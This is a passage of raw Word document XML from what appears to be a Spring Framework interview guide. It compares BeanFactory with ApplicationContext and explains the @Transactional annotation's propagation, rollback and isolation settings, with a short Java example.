            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E5A579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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ADE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event handling support.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2021202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event handling and propagation (e.g., ApplicationEventPublisher).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="3DFB2CCA" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A49AE1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37A9B78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internationalization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F173FC"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internationalization using MessageSource.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="2FA4DCBB" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F21B98"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PostProcessor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E198AB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 post-processing via BeanPostProcessor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EC131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PostProcessor and additionally allows more sophisticated bean management features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="4C0160B2" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62B4AC1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utowiring Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483A534E"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of beans via XML-based configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009AC19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and annotations like @Autowired and @Qualifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="37D58D73" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BE7784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Aware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FD815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ApplicationContextAware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5819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pplicationContextAware to allow beans to access the ApplicationContext they belong to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="198FF3CE" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16A036A4"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5CFE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Used in scenarios where a lightweight container is sufficient.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599A8FE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Typically used in most Spring-based applications because of its extended functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4288D99D"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Key Differences in Detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17112338"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 of Beans</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0780E44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Beans are created lazily, meaning they are created only when requested (via methods like getBean()). This can be beneficial for memory management when beans are not required immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C13AF8"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Beans are created eagerly when the application context is initialized. This means beans are created as soon as the application context is loaded, making it easier to manage dependencies upfront.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00467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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9CEFC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Provides additional features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1AE6D"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propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Application contexts can publish and listen for events (e.g., ContextRefreshedEvent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D412C"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r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports message resource handling for internationalized messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA09F4"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nnotation-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports annotations like @Component, @Autowired, @Value, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CECAEB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r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF814A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event handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D008B"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event handling through the ApplicationEventPublisher interface, allowing the application to publish events and listen for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A9F0D"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Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC4854C"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Supports dependency injection through XML configuration or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A8A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dependency injection and additionally works seamlessly with annotation-based configuration (@Autowired, @Component, etc.) and XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7E9EB"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 Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C059DA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ApplicationContextAware, meaning beans cannot directly access the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D31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Implements ApplicationContextAware so that beans can access the ApplicationContext they belong to and use its functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8CF49"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Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564F7F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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004859E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Best suited for lightweight scenarios where the application needs a minimal footprint, and lazy initialization is important. It is rarely used in modern Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D898D6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Used in most Spring applications, as it offers more features and is more robust for handling complex application configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21029DFC"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C737FDF"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is the basic and minimal version of the Spring container and is used in specific cases where the application requires a lightweight container with lazy bean initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD781B"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the more feature-rich, commonly used container that extends BeanFactory and includes additional features like event handling, internationalization, annotation support, and more. For most applications,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preferred due to its extensive capabilities and ease of use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB4C5E" w14:textId="713910E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107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D6EF6" w14:textId="17F95855" w:rsidR="005A272C" w:rsidRPr="00CE4B95" w:rsidRDefault="005A272C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc197867665"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Transactional annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w14:paraId="28CF3998" w14:textId="10BE519F" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Key Uses of @Transactional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7068FC"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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C787784"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 manages the start, commit, and rollback of transactions, ensuring that all database operations within the method are executed as a single unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648DF957"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f any exception occurs, the transaction can be rolled back, ensuring the consistency of the data (e.g., rolling back changes to the database in case of an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A35825"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56795F9A"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Spring provides </w:t>
      </w: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 where you can configure transactions using annotations like @Transactional instead of dealing with the low-level management of transactions (e.g., manually beginning or committing a transaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095580D3"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is allows for cleaner and more maintainable code, separating the business logic from the transaction management logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303BC504"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002044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Ensures that operations that must be executed together (like saving multiple related entities) either succeed or fail together, preserving the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Atomicity, Consistency, Isolation, Durability) properties of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B82EA"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Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A4AC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It supports various </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction propagation levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that define how the transaction should behave in case of nested method calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7762F6E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D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a transaction already exists, it will be used; otherwise, a new one will be created (default behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7C514"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S_NEW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suspends any existing transaction and creates a new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01406829"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UPPORTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a transaction exists, it will participate; otherwise, no transaction will be started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8A2D8"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MANDATORY</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method must be invoked within an existing transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC09E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EVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method must not be invoked within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D54C5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OT_SUPPORTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method will not run within a transaction, even if one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF2842"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ollback Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121846B8"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lows you to specify which exceptions should trigger a rollback and which should not. By default, only </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (subclasses of RuntimeException) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., OutOfMemoryError) trigger a rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485DB30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specify rollback behavior explicitly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAA1A9"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rollbackFor = Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608A31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34667DC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This will cause rollback for both checked and unchecked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3365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F79AB8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also specify that certain exceptions should not trigger a rollback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B581A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noRollbackFor = SQLException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033ACA72"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01751970"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // SQLException will not trigger a rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D7CA4"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1183445D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2719D"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so supports specifying different </w:t>
      </w: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 xml:space="preserve"> to control the visibility of changes made by one transaction to other concurrent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D9185"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UNCOMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows reading uncommitted changes from other transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34868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COMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows reading committed data, preventing dirty reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A3333"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PEATABLE_READ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that data read by one transaction is not modified by others until the transaction is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B07EB"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ERIALIZABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures complete isolation, preventing other transactions from reading or modifying data being read or written by the current transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB746D"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Example of @Transactional Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E39F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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D26D5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class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B91D24" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9F979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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318747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rivate UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD37E9" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E6A86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ransactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7718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ublic void createUserAndTransactionExample() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C0AE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1 = new User("John", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB5A92"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE694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2D9CB9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Simulate some error that should cause a rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08654B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if (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311EDA01"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hrow new RuntimeException("Simulated error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E2B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9F61233"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025218B"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2 = new User("Jane", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84A45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2);  // This will not be executed due to the rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA27F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7713199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2C8A16C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1858"/>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Benefits of @Transactional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62524D31"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implifies Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No need to manually start, commit, or rollback transactions. Spring handles it automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A683F2C"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 and Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures the integrity of the data by managing transaction boundaries, especially when dealing with complex database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C43D0"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Approach</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
